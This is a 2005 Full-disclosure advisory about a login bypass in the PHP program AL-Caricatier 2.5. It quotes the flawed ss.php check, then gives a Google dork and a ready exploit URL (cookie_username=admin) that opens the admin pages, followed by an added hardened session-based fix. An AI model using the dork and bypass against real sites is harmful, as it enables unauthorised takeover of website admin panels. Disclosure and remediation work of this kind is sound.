[EN] securityvulns.ru

From: God Of Death (G.O.D) <mohajali2k4_(at)_gmail.com>
Date: 22.10.2005
Subject: [Full-disclosure] Vulnerability in AL-Caricatier, V.2.5 And Prior Versions


Vulnerability in AL-Caricatier, V.2.5
Hello...
I found a vulnerability in a program called AL-Caricatier; it's an
Arabic program.
Site:
http://www.php-ar.com
Vulnerability:
Login bypass
Google dork:
inurl:view_caricatier.php
Vulnerability in an included file called ss.php which resides in
the admin directory...

    <?php
    // ss.php as posted: $cookie_username is never assigned in this file,
    // so with PHP's register_globals enabled a request parameter can populate it.
    if ($cookie_username) {
        echo "";
    } else {
        echo "<font face='tahoma' size='2'>You Didn't Sign in де Кве ИКУМкд ЗдПОид</font>";
        echo "<meta http-equiv='Refresh' content='1; url=admin_login.php'>";
        exit;
    }
    ?>

The admin directory is protected by user and password, but you can
bypass them by going to this link:
www.victim.com/view_caricatier.php
To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin
or any of the admin files instead of welcome.php,
like:
add-flashFile.php
caricatier_add.php
delete_cat.php
and you are in the admin interface...




--
®.....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF Genuises....©
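As an added illustration (not code from the AL-Caricatier project or from this post), here is how the ss.php guard quoted above can be rewritten so that admin state comes from a server-side session that only the login handler writes, instead of from a variable that any request parameter can set when register_globals is on. The file names are the post's; the session key names and the fail-closed policy are assumptions.

```php
<?php
// Added example, not AL-Caricatier code.
// The posted guard tests $cookie_username, which ss.php never initialises.
// With register_globals = On (PHP's default before 4.2 and still common in
// 2005 deployments) a query-string or cookie value of that name fills it,
// so the "signed in" branch runs without any credential check.
// The fix is to never derive authorisation from request-supplied data.

// 1. Defence in depth: refuse to serve the admin area at all if the
//    dangerous setting is enabled (assumed policy: fail closed).
if (ini_get('register_globals')) {
    die('register_globals must be disabled for the admin directory');
}

// 2. Admin state lives in the server-side session. Only admin_login.php,
//    after verifying the username and password, executes something like:
//        session_regenerate_id(true);      // prevent session fixation
//        $_SESSION['admin_user'] = $user;  // assumed key name
//        $_SESSION['admin_auth'] = true;   // assumed key name
session_start();

function require_admin()
{
    // Both keys are assumed names; neither can be set from a URL or cookie
    // because $_SESSION is populated from server-side storage only.
    if (empty($_SESSION['admin_auth']) || empty($_SESSION['admin_user'])) {
        // Send the visitor to the login form; do not render anything first,
        // so no admin page content leaks before the redirect.
        header('Location: admin_login.php');
        exit;
    }
}

require_admin();
// From here on the including admin page (welcome.php, delete_cat.php, ...)
// can trust $_SESSION['admin_user'] as the authenticated administrator.
?>
```

A server-side check like this also covers every file that includes ss.php, so the "any of the admin files instead of welcome.php" variant in the post is closed by the same change.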
